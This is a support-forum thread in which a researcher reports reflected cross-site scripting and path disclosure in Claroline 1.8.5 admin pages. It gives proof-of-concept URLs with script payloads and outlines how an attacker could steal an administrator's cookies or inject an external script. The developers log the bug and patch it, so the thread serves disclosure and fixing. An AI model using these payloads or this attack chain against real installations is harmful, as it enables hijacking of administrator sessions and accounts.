Claroline Support

[munozferna]

Full Path Disclosure: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode"><script>alert(1)</script>&dir=4

XSS: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode&dir=4"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/advancedUserSearch.php?action=all"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/campusProblem.php?view=000000010%22%3E%3Cscript%3Ealert(1)%3C/script%3E


- Fernando Muñoz

[zefredz]

Full Path Disclosure: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode"><script>alert(1)</script>&dir=4

XSS: 127.0.0.1/claroline185/claroline/admin/adminusers.php?sort=officialCode&dir=4"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/advancedUserSearch.php?action=all"><script>alert(1)</script>

XSS: 127.0.0.1/claroline185/claroline/admin/campusProblem.php?view=000000010%22%3E%3Cscript%3Ealert(1)%3C/script%3E


- Fernando Muñoz

First of all thanks for reporting these issues.

I will open a entry on the bug tracker for these since they show some unprotected variables in SQL requests or php scripts. I will correct them as soon as possible.

Maybe I am wrong, but I think those XSS only work if you are administrator on the target platform (since the admin scripts are only available if you are logged as an administrator). I tried all of the preceding with an anonymous or non admin user and none of them worked.

So they are not really critical since if you are administrator you can do what you want on the platform (get or change user password for example)... so I don't really see why a XSS can be usefull for an attacker who is already administrator.

Regards,

[zefredz]

Bug opened on the bug tracker : http://jupiter.cerdecam.be/bug/view.php?id=928

[munozferna]

It works like these:

1. Non privileged attacker send messages/post a forum with a link to a page with the XSS attack code
2. User logged in as Administrator clicks links
3. Now the attacker can steal administrator cookies, and probably do other actions with some 'advanced' javascript code. For example I could use the XSS to inject http://wiki-lyrics.com/dokeos/w.js script in the context of the claroline site, altough that script abused some old dokeos flaws, its not really hard to make it create a new admin user, delete other user accounts, etc.

[zefredz]

Ok, I've got the point

Thanks a lot

Regards

[zefredz]

This issue has been solved on the Claroline CVS. We will release a patch or a new version with the correction as soon as possible.

Here are the diffs :

http://cvs.claroline.net/cgi-bin/viewcv ... 1&r1=1.109
http://cvs.claroline.net/cgi-bin/viewcv ... .1&r1=1.45
http://cvs.claroline.net/cgi-bin/viewcv ... .1&r1=1.32

Regards